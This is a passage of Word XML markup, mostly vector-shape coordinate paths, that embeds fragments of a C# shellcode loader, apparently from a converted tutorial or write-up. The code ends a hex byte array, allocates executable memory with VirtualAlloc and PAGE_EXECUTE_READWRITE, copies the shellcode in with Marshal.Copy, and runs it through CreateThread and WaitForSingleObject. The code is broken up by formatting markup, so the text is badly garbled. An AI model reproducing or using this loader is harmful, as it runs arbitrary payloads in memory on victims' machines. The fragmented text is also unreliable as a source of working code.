3746,5355,3746,5353,3746,5350,3746,5348,3746,5345,3746,5343,3746,5340,3746,5337,3746,5334,3746,5331,3746,5328,3746,5325,3746,5322,3746,5319,3746,5315,3746,5312,3746,5309,3746,5305,3746,5301,3746,5298,3746,5294,3746,5290,3746,5286,3746,5282,3746,5278,3746,5274,3746,5269,3746,5265,3746,5260,3746,5256,3746,5251,3746,5246,3746,5241,3746,5236,3746,5231,3746,5226,3746,5221,3746,5216,3746,5210,3746,5205,3746,5199,3746,5193,3746,5187,3746,5181,3746,5175,3746,5169,3746,5163,3746,5157e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:156.500pt;margin-top:323.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3130,6470" coordsize="130,270">
        <v:shape style="position:absolute;left:3130;top:6470;width:130;height:270" coordorigin="3130,6470" coordsize="130,270" path="m3146,6492l3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3146,6492,3147,6492,3147,6492,3147,6492,3147,6492,3147,6492,3147,6492,3148,6492,3148,6492,3148,6492,3148,6492,3148,6492,3149,6492,3149,6492,3149,6492,3149,6492,3150,6492,3150,6492,3150,6492,3151,6492,3151,6492,3152,6492,3152,6492,3153,6492,3153,6492,3153,6492,3154,6492,3154,6492,3155,6492,3156,6492,3156,6492,3157,6492,3157,6492,3158,6492,3159,6492,3159,6492,3160,6492,3161,6492,3162,6492,3163,6492,3163,6492,3164,6492,3165,6492,3166,6492,3167,6492,3168,6492,3169,6492,3170,6492,3171,6492,3172,6492,3173,6492,3174,6492,3176,6492,3177,6492,3178,6492,3179,6492,3181,6492,3182,6492,3183,6492,3185,6492,3186,6492,3188,6492,3189,6492,3191,6492,3192,6492,3194,6492,3196,6492,3198,6492,3199,6492,3201,6492,3203,6492,3205,6492,3207,6492,3209,6492,3211,6492,3213,6492,3215,6492,3217,6492,3219,6492,3221,6492,3223,6492,3226,6492,3228,6492,3230,6492,3233,6492,3235,6492,3238,6492,3240,6492,3243,6492,3246,6492,3248,6492,3251,6492,3254,6492,3257,6492,3260,6492,3263,6492,3266,6492,3266,6492,3266,6492,3266,6492,3266,6492,3266,6492,3266,6492,3266,6492,3266,6492,3266,6492,3266,6492,3266,6492,3266,6492,3266,6493,3266,6493,3266,6493,3266,6493,3266,6493,3266,6493,3266,6493,3266,6493,3266,6493,3266,6494,3266,6494,3266,6494,3266,6494,3266,6495,3266,6495,3266,6495,3266,6496,3266,6496,3266,6496,3266,6497,3266,6497,3266,6498,3266,6498,3266,6499,3266,6499,3266,6500,3266,6501,3266,6501,3266,6502,3266,6503,3266,6503,3266,6504,3266,6505,3266,6506,3266,6507,3266,6508,3266,6509,3266,6510,3266,6511,3266,6512,3266,6514,3266,6515,3266,6516,3266,6517,3266,6519,3266,6520,3266,6522,3266,6523,3266,6525,3266,6527,3266,6528,3266,6530,3266,6532,3266,6534,3266,6536,3266,6538,3266,6540,3266,6542,3266,6544,3266,6546,3266,6549,3266,6551,3266,6554,3266,6556,3266,6559,3266,6561,3266,6564,3266,6567,3266,6570,3266,6573,3266,6576,3266,6579,3266,6582,3266,6585,3266,6589,3266,6592,3266,6595,3266,6599,3266,6603,3266,6606,3266,6610,3266,6614,3266,6618,3266,6622,3266,6626,3266,6630,3266,6635,3266,6639,3266,6644,3266,6648,3266,6653,3266,6658,3266,6663,3266,6668,3266,6673,3266,6678,3266,6683,3266,6688,3266,6694,3266,6699,3266,6705,3266,6711,3266,6717,3266,6723,3266,6729,3266,6735,3266,6741,3266,6747,3266,6747,3266,6747,3266,6747,3266,6747,3266,6747,3266,6747,3266,6747,3266,6747,3266,6747,3266,6747,3266,6747,3266,6747,3266,6747,3265,6747,3265,6747,3265,6747,3265,6747,3265,6747,3265,6747,3265,6747,3265,6747,3265,6747,3265,6747,3265,6747,3265,6747,3265,6747,3264,6747,3264,6747,3264,6747,3264,6747,3264,6747,3264,6747,3263,6747,3263,6747,3263,6747,3263,6747,3262,6747,3262,6747,3262,6747,3261,6747,3261,6747,3261,6747,3260,6747,3260,6747,3260,6747,3259,6747,3259,6747,3258,6747,3258,6747,3257,6747,3257,6747,3256,6747,3256,6747,3255,6747,3254,6747,3254,6747,3253,6747,3252,6747,3252,6747,3251,6747,3250,6747,3249,6747,3249,6747,3248,6747,3247,6747,3246,6747,3245,6747,3244,6747,3243,6747,3242,6747,3241,6747,3240,6747,3239,6747,3238,6747,3237,6747,3236,6747,3234,6747,3233,6747,3232,6747,3231,6747,3229,6747,3228,6747,3226,6747,3225,6747,3223,6747,3222,6747,3220,6747,3219,6747,3217,6747,3215,6747,3214,6747,3212,6747,3210,6747,3208,6747,3206,6747,3205,6747,3203,6747,3201,6747,3199,6747,3197,6747,3194,6747,3192,6747,3190,6747,3188,6747,3186,6747,3183,6747,3181,6747,3178,6747,3176,6747,3173,6747,3171,6747,3168,6747,3166,6747,3163,6747,3160,6747,3157,6747,3154,6747,3152,6747,3149,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6747,3146,6746,3146,6746,3146,6746,3146,6746,3146,6746,3146,6745,3146,6745,3146,6745,3146,6744,3146,6744,3146,6744,3146,6743,3146,6743,3146,6742,3146,6742,3146,6741,3146,6741,3146,6740,3146,6740,3146,6739,3146,6738,3146,6738,3146,6737,3146,6736,3146,6735,3146,6735,3146,6734,3146,6733,3146,6732,3146,6731,3146,6730,3146,6728,3146,6727,3146,6726,3146,6725,3146,6724,3146,6722,3146,6721,3146,6719,3146,6718,3146,6716,3146,6715,3146,6713,3146,6711,3146,6710,3146,6708,3146,6706,3146,6704,3146,6702,3146,6700,3146,6698,3146,6695,3146,6693,3146,6691,3146,6689,3146,6686,3146,6684,3146,6681,3146,6678,3146,6676,3146,6673,3146,6670,3146,6667,3146,6664,3146,6661,3146,6658,3146,6654,3146,6651,3146,6648,3146,6644,3146,6641,3146,6637,3146,6633,3146,6630,3146,6626,3146,6622,3146,6618,3146,6613,3146,6609,3146,6605,3146,6600,3146,6596,3146,6591,3146,6587,3146,6582,3146,6577,3146,6572,3146,6567,3146,6562,3146,6557,3146,6551,3146,6546,3146,6540,3146,6535,3146,6529,3146,6523,3146,6517,3146,6511,3146,6505,3146,6499,3146,6492e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:306.500pt;margin-top:410.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6130,8210" coordsize="130,270">
        <v:shape style="position:absolute;left:6130;top:8210;width:130;height:270" coordorigin="6130,8210" coordsize="130,270" path="m6147,8233l6147,8233,6147,8233,6147,8233,6147,8233,6147,8233,6147,8233,6147,8233,6147,8233,6147,8233,6147,8233,6147,8233,6147,8233,6147,8233,6147,8233,6147,8233,6147,8233,6147,8233,6147,8233,6148,8233,6148,8233,6148,8233,6148,8233,6148,8233,6148,8233,6148,8233,6148,8233,6148,8233,6148,8233,6149,8233,6149,8233,6149,8233,6149,8233,6149,8233,6150,8233,6150,8233,6150,8233,6150,8233,6151,8233,6151,8233,6151,8233,6152,8233,6152,8233,6152,8233,6153,8233,6153,8233,6154,8233,6154,8233,6154,8233,6155,8233,6155,8233,6156,8233,6157,8233,6157,8233,6158,8233,6158,8233,6159,8233,6160,8233,6160,8233,6161,8233,6162,8233,6162,8233,6163,8233,6164,8233,6165,8233,6166,8233,6167,8233,6168,8233,6169,8233,6169,8233,6171,8233,6172,8233,6173,8233,6174,8233,6175,8233,6176,8233,6177,8233,6178,8233,6180,8233,6181,8233,6182,8233,6184,8233,6185,8233,6186,8233,6188,8233,6189,8233,6191,8233,6192,8233,6194,8233,6196,8233,6197,8233,6199,8233,6201,8233,6203,8233,6204,8233,6206,8233,6208,8233,6210,8233,6212,8233,6214,8233,6216,8233,6218,8233,6221,8233,6223,8233,6225,8233,6227,8233,6230,8233,6232,8233,6234,8233,6237,8233,6239,8233,6242,8233,6245,8233,6247,8233,6250,8233,6253,8233,6255,8233,6258,8233,6261,8233,6264,8233,6267,8233,6267,8233,6267,8233,6267,8233,6267,8233,6267,8233,6267,8233,6267,8233,6267,8233,6267,8233,6267,8233,6267,8233,6267,8233,6267,8233,6267,8233,6267,8234,6267,8234,6267,8234,6267,8234,6267,8234,6267,8234,6267,8234,6267,8235,6267,8235,6267,8235,6267,8235,6267,8236,6267,8236,6267,8236,6267,8236,6267,8237,6267,8237,6267,8238,6267,8238,6267,8239,6267,8239,6267,8240,6267,8240,6267,8241,6267,8241,6267,8242,6267,8243,6267,8244,6267,8244,6267,8245,6267,8246,6267,8247,6267,8248,6267,8249,6267,8250,6267,8251,6267,8252,6267,8253,6267,8254,6267,8256,6267,8257,6267,8258,6267,8260,6267,8261,6267,8263,6267,8264,6267,8266,6267,8268,6267,8269,6267,8271,6267,8273,6267,8275,6267,8277,6267,8279,6267,8281,6267,8283,6267,8285,6267,8287,6267,8290,6267,8292,6267,8294,6267,8297,6267,8300,6267,8302,6267,8305,6267,8308,6267,8311,6267,8314,6267,8317,6267,8320,6267,8323,6267,8326,6267,8329,6267,8333,6267,8336,6267,8340,6267,8344,6267,8347,6267,8351,6267,8355,6267,8359,6267,8363,6267,8367,6267,8371,6267,8376,6267,8380,6267,8385,6267,8389,6267,8394,6267,8399,6267,8403,6267,8408,6267,8413,6267,8419,6267,8424,6267,8429,6267,8435,6267,8440,6267,8446,6267,8452,6267,8457,6267,8463,6267,8469,6267,8476,6267,8482,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6267,8488,6266,8488,6266,8488,6266,8488,6266,8488,6266,8488,6266,8488,6266,8488,6266,8488,6265,8488,6265,8488,6265,8488,6265,8488,6265,8488,6264,8488,6264,8488,6264,8488,6264,8488,6263,8488,6263,8488,6263,8488,6262,8488,6262,8488,6261,8488,6261,8488,6261,8488,6260,8488,6260,8488,6259,8488,6259,8488,6258,8488,6258,8488,6257,8488,6257,8488,6256,8488,6255,8488,6255,8488,6254,8488,6253,8488,6253,8488,6252,8488,6251,8488,6250,8488,6249,8488,6248,8488,6248,8488,6247,8488,6246,8488,6245,8488,6244,8488,6243,8488,6242,8488,6241,8488,6239,8488,6238,8488,6237,8488,6236,8488,6235,8488,6233,8488,6232,8488,6231,8488,6229,8488,6228,8488,6226,8488,6225,8488,6223,8488,6222,8488,6220,8488,6219,8488,6217,8488,6215,8488,6213,8488,6212,8488,6210,8488,6208,8488,6206,8488,6204,8488,6202,8488,6200,8488,6198,8488,6196,8488,6194,8488,6192,8488,6189,8488,6187,8488,6185,8488,6182,8488,6180,8488,6177,8488,6175,8488,6172,8488,6170,8488,6167,8488,6164,8488,6162,8488,6159,8488,6156,8488,6153,8488,6150,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8488,6147,8487,6147,8487,6147,8487,6147,8487,6147,8487,6147,8486,6147,8486,6147,8486,6147,8486,6147,8485,6147,8485,6147,8485,6147,8484,6147,8484,6147,8483,6147,8483,6147,8482,6147,8482,6147,8481,6147,8481,6147,8480,6147,8479,6147,8479,6147,8478,6147,8477,6147,8476,6147,8475,6147,8474,6147,8474,6147,8473,6147,8472,6147,8470,6147,8469,6147,8468,6147,8467,6147,8466,6147,8464,6147,8463,6147,8462,6147,8460,6147,8459,6147,8457,6147,8456,6147,8454,6147,8452,6147,8450,6147,8449,6147,8447,6147,8445,6147,8443,6147,8441,6147,8439,6147,8436,6147,8434,6147,8432,6147,8429,6147,8427,6147,8424,6147,8422,6147,8419,6147,8416,6147,8414,6147,8411,6147,8408,6147,8405,6147,8402,6147,8399,6147,8395,6147,8392,6147,8389,6147,8385,6147,8382,6147,8378,6147,8374,6147,8370,6147,8366,6147,8363,6147,8358,6147,8354,6147,8350,6147,8346,6147,8341,6147,8337,6147,8332,6147,8328,6147,8323,6147,8318,6147,8313,6147,8308,6147,8303,6147,8298,6147,8292,6147,8287,6147,8281,6147,8276,6147,8270,6147,8264,6147,8258,6147,8252,6147,8246,6147,8240,6147,8233e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:378.500pt;margin-top:445.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7570,8910" coordsize="130,250">
        <v:shape style="position:absolute;left:7570;top:8910;width:130;height:250" coordorigin="7570,8910" coordsize="130,250" path="m7588,8923l7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7588,8923,7589,8923,7589,8923,7589,8923,7589,8923,7589,8923,7589,8923,7589,8923,7590,8923,7590,8923,7590,8923,7590,8923,7590,8923,7591,8923,7591,8923,7591,8923,7591,8923,7592,8923,7592,8923,7592,8923,7593,8923,7593,8923,7593,8923,7594,8923,7594,8923,7595,8923,7595,8923,7596,8923,7596,8923,7597,8923,7597,8923,7598,8923,7598,8923,7599,8923,7600,8923,7600,8923,7601,8923,7602,8923,7602,8923,7603,8923,7604,8923,7605,8923,7606,8923,7606,8923,7607,8923,7608,8923,7609,8923,7610,8923,7611,8923,7612,8923,7613,8923,7614,8923,7616,8923,7617,8923,7618,8923,7619,8923,7620,8923,7622,8923,7623,8923,7624,8923,7626,8923,7627,8923,7629,8923,7630,8923,7632,8923,7633,8923,7635,8923,7636,8923,7638,8923,7640,8923,7642,8923,7643,8923,7645,8923,7647,8923,7649,8923,7651,8923,7653,8923,7655,8923,7657,8923,7659,8923,7661,8923,7663,8923,7666,8923,7668,8923,7670,8923,7673,8923,7675,8923,7678,8923,7680,8923,7683,8923,7685,8923,7688,8923,7691,8923,7693,8923,7696,8923,7699,8923,7702,8923,7705,8923,7708,8923,7708,8923,7708,8923,7708,8923,7708,8923,7708,8924,7708,8924,7708,8924,7708,8924,7708,8924,7708,8924,7708,8924,7708,8924,7708,8924,7708,8924,7708,8924,7708,8924,7708,8924,7708,8924,7708,8924,7708,8925,7708,8925,7708,8925,7708,8925,7708,8925,7708,8926,7708,8926,7708,8926,7708,8926,7708,8927,7708,8927,7708,8928,7708,8928,7708,8928,7708,8929,7708,8929,7708,8930,7708,8931,7708,8931,7708,8932,7708,8932,7708,8933,7708,8934,7708,8935,7708,8936,7708,8936,7708,8937,7708,8938,7708,8939,7708,8940,7708,8941,7708,8942,7708,8944,7708,8945,7708,8946,7708,8947,7708,8949,7708,8950,7708,8952,7708,8953,7708,8955,7708,8956,7708,8958,7708,8960,7708,8961,7708,8963,7708,8965,7708,8967,7708,8969,7708,8971,7708,8973,7708,8975,7708,8978,7708,8980,7708,8982,7708,8985,7708,8987,7708,8990,7708,8993,7708,8995,7708,8998,7708,9001,7708,9004,7708,9007,7708,9010,7708,9013,7708,9016,7708,9020,7708,9023,7708,9027,7708,9030,7708,9034,7708,9038,7708,9041,7708,9045,7708,9049,7708,9053,7708,9057,7708,9062,7708,9066,7708,9070,7708,9075,7708,9079,7708,9084,7708,9089,7708,9094,7708,9099,7708,9104,7708,9109,7708,9114,7708,9120,7708,9125,7708,9131,7708,9136,7708,9142,7708,9148,7708,9154,7708,9160,7708,9166,7708,9172,7708,9179,7708,9179,7708,9179,7708,9179,7708,9179,7708,9179,7708,9179,7708,9179,7708,9179,7708,9179,7708,9179,7708,9179,7708,9179,7708,9179,7708,9179,7708,9179,7708,9179,7708,9179,7708,9179,7707,9179,7707,9179,7707,9179,7707,9179,7707,9179,7707,9179,7707,9179,7707,9179,7707,9179,7706,9179,7706,9179,7706,9179,7706,9179,7706,9179,7706,9179,7705,9179,7705,9179,7705,9179,7705,9179,7704,9179,7704,9179,7704,9179,7703,9179,7703,9179,7703,9179,7702,9179,7702,9179,7701,9179,7701,9179,7700,9179,7700,9179,7700,9179,7699,9179,7698,9179,7698,9179,7697,9179,7697,9179,7696,9179,7695,9179,7695,9179,7694,9179,7693,9179,7692,9179,7692,9179,7691,9179,7690,9179,7689,9179,7688,9179,7687,9179,7686,9179,7685,9179,7684,9179,7683,9179,7682,9179,7681,9179,7680,9179,7679,9179,7678,9179,7677,9179,7675,9179,7674,9179,7673,9179,7671,9179,7670,9179,7669,9179,7667,9179,7666,9179,7664,9179,7663,9179,7661,9179,7659,9179,7658,9179,7656,9179,7654,9179,7652,9179,7651,9179,7649,9179,7647,9179,7645,9179,7643,9179,7641,9179,7639,9179,7637,9179,7634,9179,7632,9179,7630,9179,7628,9179,7625,9179,7623,9179,7621,9179,7618,9179,7616,9179,7613,9179,7610,9179,7608,9179,7605,9179,7602,9179,7600,9179,7597,9179,7594,9179,7591,9179,7588,9179,7588,9179,7588,9179,7588,9179,7588,9179,7588,9179,7588,9179,7588,9179,7588,9179,7588,9179,7588,9179,7588,9178,7588,9178,7588,9178,7588,9178,7588,9178,7588,9178,7588,9178,7588,9178,7588,9178,7588,9178,7588,9177,7588,9177,7588,9177,7588,9177,7588,9177,7588,9176,7588,9176,7588,9176,7588,9175,7588,9175,7588,9175,7588,9174,7588,9174,7588,9173,7588,9173,7588,9172,7588,9172,7588,9171,7588,9170,7588,9170,7588,9169,7588,9168,7588,9167,7588,9167,7588,9166,7588,9165,7588,9164,7588,9163,7588,9162,7588,9161,7588,9160,7588,9159,7588,9157,7588,9156,7588,9155,7588,9153,7588,9152,7588,9151,7588,9149,7588,9148,7588,9146,7588,9144,7588,9143,7588,9141,7588,9139,7588,9137,7588,9135,7588,9133,7588,9131,7588,9129,7588,9127,7588,9124,7588,9122,7588,9120,7588,9117,7588,9115,7588,9112,7588,9110,7588,9107,7588,9104,7588,9101,7588,9098,7588,9095,7588,9092,7588,9089,7588,9086,7588,9082,7588,9079,7588,9075,7588,9072,7588,9068,7588,9065,7588,9061,7588,9057,7588,9053,7588,9049,7588,9045,7588,9040,7588,9036,7588,9032,7588,9027,7588,9023,7588,9018,7588,9013,7588,9008,7588,9003,7588,8998,7588,8993,7588,8988,7588,8983,7588,8977,7588,8972,7588,8966,7588,8960,7588,8954,7588,8948,7588,8942,7588,8936,7588,8930,7588,8923e x" fillcolor="#fefefe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86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72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0xe7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0x58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0x6a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0x59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0xc7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0xf0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0xb5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0xa2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xd5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="137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73</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="81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74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75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UInt32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funcAddr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VirtualAlloc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UInt32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)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shellcode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Length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76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MEM_COMMIT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PAGE_EXECUTE_READWRITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="21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77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Marshal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Copy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shellcode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IntPtr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funcAddr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shellcode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Length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78</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="22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IntPtr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hThread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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IntPtr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Zero</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="316" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7222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79</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="15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UInt32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threadId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="20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20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0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;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80</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="25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81</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="81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82</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="316" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="6381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83</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="20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IntPtr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pinfo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IntPtr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Zero</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;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84</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="25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85</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="81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86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87</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="23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hThread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CreateThread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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31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funcAddr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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pinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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31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ref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threadId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="4701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88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WaitForSingleObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16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hThread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0xFFFFFFFF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;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89</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="28" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="9503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90</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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}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91</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="28" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="458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92</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="22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private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="28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UInt32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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MEM_COMMIT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="28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28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0x1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;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93</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="28" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="338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94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private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static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UInt32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PAGE_EXECUTE_READWRITE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22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0x40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;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95</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
